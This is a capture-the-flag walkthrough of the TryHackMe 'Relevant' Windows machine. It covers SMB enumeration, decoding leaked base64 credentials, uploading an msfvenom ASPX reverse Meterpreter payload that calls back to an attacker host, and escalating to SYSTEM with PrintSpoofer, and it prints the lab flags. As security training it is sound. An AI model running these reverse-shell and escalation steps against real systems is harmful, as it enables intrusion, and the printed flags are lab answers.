Introduction

We were hired to perform a seven‑day black‑box penetration test on a pre‑production environment (TryHackMe room: https://tryhackme.com/room/relevant). With only the target IP in scope, our main objectives were to locate and submit user.txt and root.txt as proof of compromise, while also identifying and documenting all vulnerabilities present. The engagement emphasized manual enumeration and exploitation before resorting to automated tools, though any tool was permitted and nothing in this room requires Metasploit.

We treated this exercise like a real client engagement: starting with reconnaissance and service discovery, followed by web and SMB enumeration, targeted exploitation, and post-exploitation privilege escalation. Each step was carefully documented with commands, screenshots, and proof, and we included remediation suggestions to help secure the environment prior to production. This structured approach not only ensured we captured all findings but also provided a clear workflow for anyone learning penetration testing or preparing for professional assessment

Initial Reconnaissance

I began with an aggressive nmap service/version scan to quickly discover open ports, service banners, and OS guesses.

nmap -sV -sC -A -Pn 10.201.45.153

nmap output:

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393
3389/tcp open  ms-wbt-server Microsoft Terminal Services

What this told me

• Port 80 is running Microsoft IIS 10.0 → likely a web application to enumerate.
• SMB ports (139/445) are open — this often means shares or files are available to read if anonymous/guest is allowed.
• RPC (135) and RDP (3389) are reachable — RDP could be an alternate attack vector, but I stuck to manual enumeration first.
• nmap also revealed some useful service info like the machine name (Relevant) and an SSL certificate commonName Relevant.

Note: The scanner initially reported most other ports as filtered; later I discovered an additional high TCP port (49663) worth checking.

SMB enumeration

Because SMB was open, I listed the available shares using smbclient -L:

smbclient -L 10.201.45.153

This listed shares including ADMIN$, C$, IPC$ and an interesting named share nt4wrksv. I connected to the nt4wrksv share:

smbclient //10.201.45.153/nt4wrksv

Once connected, I listed files with ls and found a file called passwords.txt:

smb: \> ls
  passwords.txt
smb: \> get passwords.txt

I downloaded passwords.txt and inspected it:

cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

The file contained base64-encoded lines. I decoded them in the terminal using base64 -d:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
# => Bob - !P@$$W0rD!123
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
# => Bill - Juw4nnaM4n420696969!$$$

Result: I recovered two credentials:

• Bob — password: !P@$$W0rD!123
• Bill — password: Juw4nnaM4n420696969!$$$

Web enumeration

With port 80 open I checked the web server first, but a quick manual look and directory enumeration on :80 didn’t reveal anything useful.

I then fuzzed the suspicious high port 49663 where I’d noticed a service earlier.

Directory brute-force

dirsearch -u http://<ip>:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Result:

[11:00:28] 301 -  159B  - /nt4wrksv  ->  http://10.201.48.253:49663/nt4wrksv/

This confirmed /nt4wrksv is a web-accessible directory (and matches the SMB share name).

Exploitation approach (why ASPX)

The directory accepted .aspx pages (ASP.NET), so I generated a Windows ASPX reverse Meterpreter payload. I used msfvenom and set LHOST to my attacking machine IP (replace 10.17.30.120 with your Kali IP) and an arbitrary LPORT:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=1234 -f aspx > exploit.aspx

I uploaded the generated exploit.aspx to the SMB share (same nt4wrksv share) using smbclient:

smbclient //10.201.45.153/nt4wrksv
# (press Enter for anonymous if prompted)
smb: \> put exploit.aspx
smb: \> exit

Start the handler and trigger the payload

I started Metasploit’s handler to catch the Meterpreter session:

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <your-IP>
set LPORT 1234
run

Then I triggered the uploaded ASPX by requesting it (browser or curl):

curl http://10.201.45.153:49663/nt4wrksv/exploit.aspx

Shortly after, the handler returned a Meterpreter session:

Capturing the user flag

Inside the Meterpreter session I navigated to Bob’s Desktop and read user.txt:

meterpreter > cat "c:\\Users\\Bob\\Desktop\\user.txt"
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Note: the TryHackMe lab expired during my testing and I restarted the lab, so the target/attacker IPs changed — ignore differences

Post‑exploitation

After capturing the user flag, I checked my privileges inside the Meterpreter session to look for escalation opportunities:

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter >

SeImpersonatePrivilege stood out — it allows a process to impersonate another user and is commonly abused to get SYSTEM. A widely used tool for this on Windows is PrintSpoofer (author: itm4n), which leverages that privilege to spawn a SYSTEM shell.

Privilege‑Escalation binary

I downloaded the PrintSpoofer binary to my attacking machine and uploaded it to the writable nt4wrksv share:

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

smbclient //10.201.45.153/nt4wrksv
smb: \> put PrintSpoofer64.exe
smb: \> exit

Spawn an interactive shell and run PrintSpoofer

From Meterpreter I dropped to a Windows shell and navigated to the web directory where I uploaded the binary:

meterpreter > shell
c:\> cd c:\inetpub\wwwroot\nt4wrksv
c:\inetpub\wwwroot\nt4wrksv> dir
# shows exploit.aspx, passwords.txt, PrintSpoofer64.exe

I executed PrintSpoofer to spawn a SYSTEM process (it spawns powershell.exe as SYSTEM in this example):

PrintSpoofer64.exe -i -c powershell.exe

Capture the root flag

With SYSTEM privileges I navigated to the Administrator Desktop and read the final flag:

PS C:\Windows\system32> cat C:\Users\Administrator\Desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

Conclusion

I exploited exposed SMB and IIS services to recover credentials, gained a Meterpreter shell, and escalated to SYSTEM with PrintSpoofer to capture user.txt and root.txt. This lab highlights the dangers of exposed shares and excessive privileges—practice manual enumeration and least‑privilege remediation.